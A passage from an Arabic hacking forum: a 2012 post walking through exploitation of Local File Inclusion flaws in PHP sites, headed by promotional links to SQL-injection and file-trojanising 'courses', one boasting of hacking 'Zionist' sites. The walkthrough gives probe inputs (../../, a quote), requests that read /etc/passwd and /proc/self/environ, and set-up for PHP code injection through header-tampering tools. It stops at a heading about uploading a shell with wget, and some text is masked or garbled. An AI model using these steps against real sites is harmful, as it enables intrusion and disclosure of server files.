1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

شرح شرح أستغلال ثغرات من نوع LFI + حقن ***** php

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏1 أغسطس 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 1,640 الردود : 0 ‏1 أغسطس 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    <div><div align="center">بسم الله الرحمن الرحيم


    شرح بسيط أو نبذة بسيطة عن ثــغرات

    EXPLOITING LFI VULNERABILITIES


    اولاً :

    لنفترض أن الموقع المصاب


    http://www.site.com/index.php?page=1

    [​IMG]

    نمسح رقم 1 وندخل مدخلات أخرى اذا لم يظهر معانا الخطاء لنتأكد من الاصابة :

    مثال

    ../../

    أو

    '



    راح يظهر الخطاء البرمجي معانا

    [​IMG]

    حلو , تأكدنا من أصابته بثغره LFI

    ثانيا :

    نستعرض ملف /etc/passwd الي هو موجود في كل اجهز ال unix تقريبا مع العلم بأختلاف المسارات ...


    مثال

    http://www.site.com/index.php?page=1

    يصبح بعد الاستغلال كذا

    http://www.site.com/index.php?page=/etc/password

    راح تظهر معانا المعلومات بكل بساطه اذا كان الموقع مصاب !

    [​IMG]

    أستطعنا قرأت الملف ألان نحاول التأكد من قابلية الحـقن بالامر /proc/self/environ

    مثال


    http://www.site.com/index.php?page=1

    ندخل الامر

    http://www.site.com/index.php?page= /proc/self/environ


    يظهر معانا

    [​IMG]


    جمــيل جـدا ,,


    ثـالثا :



    نأتي الى عملية الحقن بأٍستخدام injecting whit PHP code

    تحتاج برنامج او بالاصح ( اضافة الى فايرفوكس )

    - timber data

    او

    -Live HTTP Headers

    او

    - Burp Suite

    بعد تنصيب وتشغيل الاداة ( timber data ) نــظغط على start timber ونسوي refresh لصفحة الموقع الي شغالين عليه .. راح تظهر لك ثلاث أختيارات أختار الامر timber

    [​IMG]


    هناك أمرين للحقن :


    UPLOAD ***** WITH WGET:
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...